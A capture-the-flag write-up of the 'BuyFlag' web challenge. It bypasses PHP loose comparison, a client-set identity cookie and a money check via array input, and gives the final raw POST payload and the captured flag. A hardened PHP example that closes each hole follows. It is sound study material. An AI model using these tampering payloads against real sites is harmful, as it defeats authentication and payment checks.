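[Geek Challenge 2019] BuyFlag 1
Opening the instance leads to the pay.php page, which contains hints.
The page source reveals the logic for a password submitted via POST.
Capture the request with Burp Suite and pass in the money and password parameters. The password is checked with a == loose comparison, so appending one character is enough to bypass it.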
password=404a&money=100000000
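The response shows no change.
Note that the buyer has to be a CUIT student (Only Cuit's students can buy the FLAG).
Try modifying the request headers, changing the cookie check value to 1 (0 false, 1 true).
This bypasses the identity check (on my side, for some reason Burp kept reporting that password could not be passed through), so I switched to HackBar to submit. The response now shows that the password is correct and the identity check passes, but the money is wrong; I suspect a length problem. (you have not enough money,loser~)
Using an array bypasses the check, and the flag is obtained.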
password=404a&money[]=100000000
flag{46a2d632-843d-41bf-9a8a-42aac15baf18}
Final payload
POST /pay.php HTTP/1.1
Host: 8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
Connection: keep-alive
Referer: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81/pay.php
Cookie: user=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=404a&money[]=100000000
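
A strict version of the three checks this writeup gets past (loose password comparison, identity taken from a cookie, money accepted as an array), as an added example that is not the challenge's source code. The function names, the 'is_student' session key, EXPECTED_PASSWORD and FLAG_PRICE are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed values for illustration; not taken from the challenge source.
const EXPECTED_PASSWORD = '404';
const FLAG_PRICE = 100000000;

// Accept only a scalar string; "money[]=..." arrives as an array and is rejected.
function scalar_param(array $src, string $key): ?string
{
    $v = $src[$key] ?? null;
    return is_string($v) ? $v : null;
}

function password_ok(?string $pw): bool
{
    // hash_equals compares strings byte for byte with no type juggling, so
    // "404a" fails. (PHP 7 and earlier evaluate "404a" == 404 as true.)
    return $pw !== null && hash_equals(EXPECTED_PASSWORD, $pw);
}

function money_ok(?string $money): bool
{
    // Digits only, bounded length, then an integer comparison.
    if ($money === null || !preg_match('/^[0-9]{1,12}$/D', $money)) {
        return false;
    }
    return (int)$money >= FLAG_PRICE;
}

function can_buy(array $post, array $session): bool
{
    // Identity comes from server-side session state, never from a client cookie.
    $isStudent = ($session['is_student'] ?? false) === true;
    return $isStudent
        && password_ok(scalar_param($post, 'password'))
        && money_ok(scalar_param($post, 'money'));
}

// Constructed inputs mirroring the requests in this writeup.
$cases = [
    'suffix password' => [['password' => '404a', 'money' => '100000000'], ['is_student' => true]],
    'array money'     => [['password' => '404', 'money' => ['100000000']], ['is_student' => true]],
    'no session'      => [['password' => '404', 'money' => '100000000'], []],
    'legitimate'      => [['password' => '404', 'money' => '100000000'], ['is_student' => true]],
];
foreach ($cases as $name => [$post, $session]) {
    printf("%-16s %s\n", $name, can_buy($post, $session) ? 'allowed' : 'denied');
}
```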